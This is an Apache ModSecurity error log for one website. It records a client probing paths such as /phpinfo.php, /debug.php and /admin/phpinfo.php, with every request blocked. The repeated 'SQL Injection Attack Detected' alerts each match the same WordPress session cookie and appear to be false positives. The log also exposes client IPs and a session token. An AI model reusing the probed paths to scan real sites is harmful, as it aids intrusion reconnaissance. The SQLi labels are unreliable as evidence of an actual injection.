[unique_id "agHHQKy-5-wpj6Sx56aBWAAAABU"]
[Mon May 11 14:10:40.862578 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/info.php"] [unique_id "agHHQKy-5-wpj6Sx56aBWAAAABU"]
[Mon May 11 14:10:40.862818 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/info.php"] [unique_id "agHHQKy-5-wpj6Sx56aBWAAAABU"]
[Mon May 11 14:10:41.025413 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/php.php"] [unique_id "agHHQay-5-wpj6Sx56aBWQAAABU"]
[Mon May 11 14:10:41.025635 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/php.php"] [unique_id "agHHQay-5-wpj6Sx56aBWQAAABU"]
[Mon May 11 14:10:41.025933 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/php.php"] [unique_id "agHHQay-5-wpj6Sx56aBWQAAABU"]
[Mon May 11 14:10:41.247483 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/i.php"] [unique_id "agHHQay-5-wpj6Sx56aBWgAAABU"]
[Mon May 11 14:10:41.247682 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/i.php"] [unique_id "agHHQay-5-wpj6Sx56aBWgAAABU"]
[Mon May 11 14:10:41.247945 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/i.php"] [unique_id "agHHQay-5-wpj6Sx56aBWgAAABU"]
[Mon May 11 14:10:41.412585 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/pi.php"] [unique_id "agHHQay-5-wpj6Sx56aBWwAAABU"]
[Mon May 11 14:10:41.412798 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/pi.php"] [unique_id "agHHQay-5-wpj6Sx56aBWwAAABU"]
[Mon May 11 14:10:41.413051 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/pi.php"] [unique_id "agHHQay-5-wpj6Sx56aBWwAAABU"]
[Mon May 11 14:10:41.597084 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/pinfo.php"] [unique_id "agHHQay-5-wpj6Sx56aBXAAAABU"]
[Mon May 11 14:10:41.597299 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/pinfo.php"] [unique_id "agHHQay-5-wpj6Sx56aBXAAAABU"]
[Mon May 11 14:10:41.597569 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/pinfo.php"] [unique_id "agHHQay-5-wpj6Sx56aBXAAAABU"]
[Mon May 11 14:10:41.690638 2026] [core:error] [pid 1319886:tid 1319936] [client 52.242.216.199:21752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:41.690663 2026] [core:error] [pid 1319886:tid 1319936] [client 52.242.216.199:21752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:41.769526 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/test.php"] [unique_id "agHHQay-5-wpj6Sx56aBXgAAABU"]
[Mon May 11 14:10:41.769719 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/test.php"] [unique_id "agHHQay-5-wpj6Sx56aBXgAAABU"]
[Mon May 11 14:10:41.769967 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/test.php"] [unique_id "agHHQay-5-wpj6Sx56aBXgAAABU"]
[Mon May 11 14:10:41.966434 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo"] [unique_id "agHHQay-5-wpj6Sx56aBXwAAABU"]
[Mon May 11 14:10:41.966735 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo"] [unique_id "agHHQay-5-wpj6Sx56aBXwAAABU"]
[Mon May 11 14:10:41.967121 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo"] [unique_id "agHHQay-5-wpj6Sx56aBXwAAABU"]
[Mon May 11 14:10:42.178943 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/p.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYAAAABU"]
[Mon May 11 14:10:42.179138 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/p.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYAAAABU"]
[Mon May 11 14:10:42.179416 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/p.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYAAAABU"]
[Mon May 11 14:10:42.363322 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/debug.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYQAAABU"]
[Mon May 11 14:10:42.363523 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/debug.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYQAAABU"]
[Mon May 11 14:10:42.363779 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/debug.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYQAAABU"]
[Mon May 11 14:10:42.560115 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/admin/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYgAAABU"]
[Mon May 11 14:10:42.560340 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/admin/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYgAAABU"]
[Mon May 11 14:10:42.560592 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/admin/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYgAAABU"]
[Mon May 11 14:10:42.763998 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/test/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYwAAABU"]
[Mon May 11 14:10:42.764207 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/test/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYwAAABU"]
[Mon May 11 14:10:42.764433 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/test/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBYwAAABU"]
[Mon May 11 14:10:42.891833 2026] [core:error] [pid 1319953:tid 1319962] [client 52.242.216.199:59585] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:42.891867 2026] [core:error] [pid 1319953:tid 1319962] [client 52.242.216.199:59585] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:42.948122 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dev/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBZAAAABU"]
[Mon May 11 14:10:42.948333 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dev/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBZAAAABU"]
[Mon May 11 14:10:42.948547 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dev/phpinfo.php"] [unique_id "agHHQqy-5-wpj6Sx56aBZAAAABU"]
[Mon May 11 14:10:43.141058 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/old/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBZQAAABU"]
